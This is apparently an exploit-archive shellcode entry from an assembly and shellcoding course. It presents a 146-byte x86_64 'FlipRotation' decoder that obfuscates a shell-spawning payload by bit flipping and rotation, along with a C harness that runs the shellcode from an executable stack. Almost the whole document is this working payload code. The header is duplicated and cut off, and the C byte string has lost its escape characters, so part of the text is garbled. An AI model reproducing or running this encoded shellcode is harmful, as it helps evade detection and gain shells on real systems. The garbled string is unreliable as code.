## Exploit Author: Eduardo Silva
## Date: 2022-12-31
## Tested on: Linux x86_64 SMP Debian 4.19.260-1
## SLAE/St ## Exploit Title: FlipRotation v1.0 decoder - Shellcode (146 bytes)
## Exploit Author: Eduardo Silva
## Date: 2022-12-31
## Tested on: Linux x86_64 SMP Debian 4.19.260-1
## SLAE/Student ID: PA-31319
## Webpage: https://0xnibbles.github.io/
## Twitter: @0xnibbles
## Course: This shellcode was created for the x86 Assembly Language and Shellcoding on Linux (SLAE32) Course offered at pentesteracademy.com.
## Description: The inspiration for this algorithm was the known CBC bit-flipping attack but applying a simple variation to our context.
##
## More specifically, the steps are
##
## 1 - We pick each shelcode byte and flip the last bit using a xor operation - flipped_shellbyte = shellbyte ^ 0x01
## 2 - Based on that output the rotation direction is defined. We rotate right if odd or left if even. The number of rotation positions is defined by the loop index value (number of interations) of the loop at that time.
## 3 - If we rotate right we append 0x2 afther the encoded byte and if we rotate left we append 0xff
## 4 - Put the byte 0xa0 as the shellcode end marker
##
## More info at https://0xnibbles.github.io/posts/slae_32_assignment_4/ - the 64 bit version has the same logic as 32 bit
##
## Example:
## $ ./shellcode
## Shellcode Length: 146
## id
## uid=1000 ...
##
########################################################################
global _start
section .text
_start:
jmp decoder
EncodedShellcode: db 0x49,0xff,0x18,0x02,0x7,0xff,0x8a,0xff,0x94,0xff,0xd5,0x02,0xb8,0x02,0xb1,0xff,0x68,0x02,0xde,0xff,0x8b,0x02,0xc5,0x02,0x27,0x02,0x2d,0xff,0x49,0x02,0xa4,0xff,0x88,0x02,0x73,0x02,0x45,0xff,0x4a,0xff,0x88,0x02,0x7c,0xff,0x59,0x02,0xa4,0xff,0x88,0x02,0xcf,0xff,0x25,0xff,0x50,0x02,0x1c,0xff,0xd1,0x02,0x38,0x02,0x8,0x02,0xa0,0xa0 ; 0xa0 is the stop marker
decoder:
lea rsi, [rel EncodedShellcode]
lea rdi, [rsi+1] ; pointing to second byte (0x02) from shellcode
xor rax, rax
mul rax ; zeroes edx
mov al, 1
xor rcx, rcx
xor rbx, rbx
decode:
mov bl, byte [rsi + rax] ; mov parity byte to bl
xor bl, 0xa0 ; check if reached the end marker | 0xa0 ^ 0xff = 0x5f
jz short EncodedShellcode ; reached the marker if Zero Flag not set
xor bl, 0x5f ; if equal parity is even (0xff)
mov bl, byte [rsi + rdx]
jnz odd
even: ; rotate right
ror bl, cl
jmp short bitFlip
odd: ; rotate left
rol bl, cl
bitFlip:
xor bl, 0x01
restore_next_byte:
mov byte [rsi + rdx], bl ; replaces the original byte
mov bl, byte [rsi + rax+1] ; mov next shellbyte
mov byte [rdi], bl
inc rdi
add al, 2
inc dl
inc cl
; Doing circular array as modulo workaround. Use 0x08 as a divisor or circular boundary because we are rotating 8 bits (al register).
cmp cl, 0x08 ; if equal ZF will be set meaning we have a complete rotation
jnz decode ; $+2 ; jump if rotation is not complete
xor rcx, rcx ; if rotation is complete and reset cl to start again the "circular array"
jmp short decode
##############################################
// Filename: shellcode.c
// Compile: gcc -z execstack -fno-stack-protector shellcode.c -o shellcode
#include<stdio.h>
#include<string.h>
unsigned char code[] =
"xebx42x49xffx18x02x07xffx8axffx94xffxd5x02xb8x02xb1xffx68x02xdexffx8bx02xc5x02x27x02x2dxffx49x02xa4xffx88x02x73x02x45xffx4axffx88x02x7cxffx59x02xa4xffx88x02xcfxffx25xffx50x02x1cxffxd1x02x38x02x08x02xa0xa0x48x8dx35xb7xffxffxffx48x8dx7ex01x48x31xc0x48xf7xe0xb0x01x48x31xc9x48x31xdbx8ax1cx06x80xf3xa0x74x9dx80xf3x5fx8ax1cx16x75x04xd2xcbxebx02xd2xc3x80xf3x01x88x1cx16x8ax5cx06x01x88x1fx48xffxc7x04x02xfexc2xfexc1x80xf9x08x75xd0x48x31xc9xebxcb";
main() {
printf("Shellcode Length: %d ", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}